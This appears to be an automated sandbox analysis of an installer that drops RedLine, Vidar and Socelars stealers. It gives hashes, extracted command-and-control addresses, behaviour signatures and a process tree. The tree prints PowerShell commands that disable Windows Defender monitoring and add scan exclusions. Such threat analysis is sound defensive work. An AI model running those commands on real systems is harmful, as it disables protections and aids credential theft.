Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
18005s -
max time network
18009s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
02-11-2021 06:54
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
newjust
135.181.129.119:4805
Extracted
redline
media0121
91.121.67.60:23325
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
resource yara_rule behavioral1/memory/2368-230-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2360-229-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2368-232-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2360-231-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2368-234-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2360-233-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2368-236-0x0000000000418D3A-mapping.dmp family_redline behavioral1/memory/2360-235-0x0000000000418D26-mapping.dmp family_redline behavioral1/memory/2360-239-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0005000000013294-103.dat family_socelars behavioral1/files/0x0005000000013294-172.dat family_socelars behavioral1/files/0x0005000000013294-179.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1604-347-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar behavioral1/memory/1604-348-0x0000000001E10000-0x0000000001EE6000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00050000000130d5-70.dat aspack_v212_v242 behavioral1/files/0x00060000000126a2-72.dat aspack_v212_v242 behavioral1/files/0x00050000000130d5-71.dat aspack_v212_v242 behavioral1/files/0x00060000000126a2-73.dat aspack_v212_v242 behavioral1/files/0x000500000001318e-76.dat aspack_v212_v242 behavioral1/files/0x000500000001318e-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 53 IoCs
pid Process 436 setup_installer.exe 688 setup_install.exe 1308 Mon179f74c0ff3cf1f.exe 1760 Mon173a360b525.exe 1724 Mon178e7a516181.exe 1644 Mon1727c156c4abcec.exe 616 Mon1708beae021a5ff.exe 1572 Mon17bffc2992eb3d.exe 1684 Mon17bbf11fdb575d.exe 2008 Mon17870faab0.exe 908 Mon17332e41e6b.exe 1152 Mon178d8e5d06822.exe 1780 Mon1708beae021a5ff.exe 1508 Mon174a6c5f1664f.exe 1044 Mon17bbf11fdb575d.tmp 2088 Mon17bbf11fdb575d.exe 2212 Mon17bbf11fdb575d.tmp 2360 Mon174a6c5f1664f.exe 2368 Mon1727c156c4abcec.exe 2688 1211786845.exe 2776 postback.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 1772 LzmwAqmV.exe 2240 3484752.exe 944 2348572303.exe 2412 4213580.exe 2452 DownFlSetup110.exe 2320 inst1.exe 1604 Soft1WW01.exe 1416 chrome.exe 2568 chrome2.exe 2292 search_hyperfs_206.exe 2780 924123.exe 2632 setup.exe 2928 zhanglijuan-game.exe 2860 Calculator Installation.exe 2604 7862565.exe 1208 5959431.exe 2264 2436926.exe 2052 chrome3.exe 2008 Chrome5.exe 1780 kPBhgOaGQk.exe 2676 3605476.exe 2784 3087753.exe 2156 663376.exe 1416 2816160.exe 2000 4257421.exe 2116 1002079.exe 2316 FZkDRs9RSZN.Exe 1388 WinHoster.exe 3416 services64.exe 2432 FZkDRs9RSZN.Exe 3872 sihost64.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 924123.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3087753.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3087753.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 663376.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 663376.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4213580.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4213580.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 924123.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Mon179f74c0ff3cf1f.exe -
Loads dropped DLL 64 IoCs
pid Process 1724 setup_x86_x64_install.exe 436 setup_installer.exe 436 setup_installer.exe 436 setup_installer.exe 436 setup_installer.exe 436 setup_installer.exe 436 setup_installer.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 1124 cmd.exe 328 cmd.exe 328 cmd.exe 1676 cmd.exe 1676 cmd.exe 1796 cmd.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1760 Mon173a360b525.exe 1760 Mon173a360b525.exe 1776 cmd.exe 576 cmd.exe 576 cmd.exe 1724 Mon178e7a516181.exe 1724 Mon178e7a516181.exe 1176 cmd.exe 1840 cmd.exe 1644 Mon1727c156c4abcec.exe 1644 Mon1727c156c4abcec.exe 1712 cmd.exe 1572 Mon17bffc2992eb3d.exe 1572 Mon17bffc2992eb3d.exe 1684 Mon17bbf11fdb575d.exe 1684 Mon17bbf11fdb575d.exe 1524 cmd.exe 1524 cmd.exe 1508 Mon174a6c5f1664f.exe 1508 Mon174a6c5f1664f.exe 1684 Mon17bbf11fdb575d.exe 2008 Mon17870faab0.exe 2008 Mon17870faab0.exe 1044 Mon17bbf11fdb575d.tmp 1044 Mon17bbf11fdb575d.tmp 1044 Mon17bbf11fdb575d.tmp 1044 Mon17bbf11fdb575d.tmp 2088 Mon17bbf11fdb575d.exe 2088 Mon17bbf11fdb575d.exe 2088 Mon17bbf11fdb575d.exe 2212 Mon17bbf11fdb575d.tmp 2212 Mon17bbf11fdb575d.tmp 2212 Mon17bbf11fdb575d.tmp 1508 Mon174a6c5f1664f.exe 1644 Mon1727c156c4abcec.exe 2360 Mon174a6c5f1664f.exe 2360 Mon174a6c5f1664f.exe 2368 Mon1727c156c4abcec.exe 2368 Mon1727c156c4abcec.exe 2544 cmd.exe 2688 1211786845.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5959431.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 924123.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3087753.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 663376.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4213580.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 71 freegeoip.app 73 freegeoip.app 74 freegeoip.app 78 freegeoip.app 53 ipinfo.io 54 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2412 4213580.exe 2780 924123.exe 2784 3087753.exe 2156 663376.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1508 set thread context of 2360 1508 Mon174a6c5f1664f.exe 66 PID 1644 set thread context of 2368 1644 Mon1727c156c4abcec.exe 65 PID 3032 set thread context of 3920 3032 conhost.exe 167 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\is-IG7U9.tmp Mon17bbf11fdb575d.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Mon17bbf11fdb575d.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Mon17bbf11fdb575d.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2832 1724 WerFault.exe 45 808 1308 WerFault.exe 43 1292 2052 WerFault.exe 102 3112 1604 WerFault.exe 90 2732 1760 WerFault.exe 44 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4092 schtasks.exe -
Kills process with taskkill 6 IoCs
pid Process 2728 taskkill.exe 2652 taskkill.exe 108 taskkill.exe 2896 taskkill.exe 472 taskkill.exe 3588 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Mon17870faab0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Mon17870faab0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mon17870faab0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon17870faab0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1656 powershell.exe 1476 powershell.exe 2212 Mon17bbf11fdb575d.tmp 2212 Mon17bbf11fdb575d.tmp 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 1308 Mon179f74c0ff3cf1f.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe 3020 4HRNC5d53KWlNBXLCAhwXlp_.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 2832 WerFault.exe 808 WerFault.exe 1292 WerFault.exe 3112 WerFault.exe 2732 WerFault.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1388 WinHoster.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 2008 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 2008 Mon17870faab0.exe Token: SeLockMemoryPrivilege 2008 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 2008 Mon17870faab0.exe Token: SeMachineAccountPrivilege 2008 Mon17870faab0.exe Token: SeTcbPrivilege 2008 Mon17870faab0.exe Token: SeSecurityPrivilege 2008 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 2008 Mon17870faab0.exe Token: SeLoadDriverPrivilege 2008 Mon17870faab0.exe Token: SeSystemProfilePrivilege 2008 Mon17870faab0.exe Token: SeSystemtimePrivilege 2008 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 2008 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 2008 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 2008 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 2008 Mon17870faab0.exe Token: SeBackupPrivilege 2008 Mon17870faab0.exe Token: SeRestorePrivilege 2008 Mon17870faab0.exe Token: SeShutdownPrivilege 2008 Mon17870faab0.exe Token: SeDebugPrivilege 2008 Mon17870faab0.exe Token: SeAuditPrivilege 2008 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 2008 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 2008 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 2008 Mon17870faab0.exe Token: SeUndockPrivilege 2008 Mon17870faab0.exe Token: SeSyncAgentPrivilege 2008 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 2008 Mon17870faab0.exe Token: SeManageVolumePrivilege 2008 Mon17870faab0.exe Token: SeImpersonatePrivilege 2008 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 2008 Mon17870faab0.exe Token: 31 2008 Mon17870faab0.exe Token: 32 2008 Mon17870faab0.exe Token: 33 2008 Mon17870faab0.exe Token: 34 2008 Mon17870faab0.exe Token: 35 2008 Mon17870faab0.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 1152 Mon178d8e5d06822.exe Token: SeDebugPrivilege 908 Mon17332e41e6b.exe Token: SeDebugPrivilege 2728 taskkill.exe Token: SeDebugPrivilege 2832 WerFault.exe Token: SeDebugPrivilege 808 WerFault.exe Token: SeDebugPrivilege 2452 DownFlSetup110.exe Token: SeDebugPrivilege 1416 chrome.exe Token: SeDebugPrivilege 2568 chrome2.exe Token: SeDebugPrivilege 2360 Mon174a6c5f1664f.exe Token: SeDebugPrivilege 2652 taskkill.exe Token: SeDebugPrivilege 2052 chrome3.exe Token: SeDebugPrivilege 108 taskkill.exe Token: SeDebugPrivilege 2896 taskkill.exe Token: SeDebugPrivilege 2412 4213580.exe Token: SeDebugPrivilege 2264 2436926.exe Token: SeDebugPrivilege 1292 WerFault.exe Token: SeDebugPrivilege 2676 3605476.exe Token: SeDebugPrivilege 472 taskkill.exe Token: SeDebugPrivilege 3112 WerFault.exe Token: SeDebugPrivilege 2636 conhost.exe Token: SeDebugPrivilege 2368 Mon1727c156c4abcec.exe Token: SeDebugPrivilege 2780 924123.exe Token: SeDebugPrivilege 2116 1002079.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 3032 conhost.exe Token: SeDebugPrivilege 2156 663376.exe Token: SeDebugPrivilege 944 2348572303.exe Token: SeDebugPrivilege 2240 3484752.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2212 Mon17bbf11fdb575d.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 1724 wrote to memory of 436 1724 setup_x86_x64_install.exe 28 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 436 wrote to memory of 688 436 setup_installer.exe 29 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 948 688 setup_install.exe 31 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 2000 688 setup_install.exe 32 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1176 688 setup_install.exe 33 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1796 688 setup_install.exe 34 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 1732 688 setup_install.exe 36 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 576 688 setup_install.exe 35 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 328 688 setup_install.exe 37 PID 688 wrote to memory of 1776 688 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:948
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:2000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
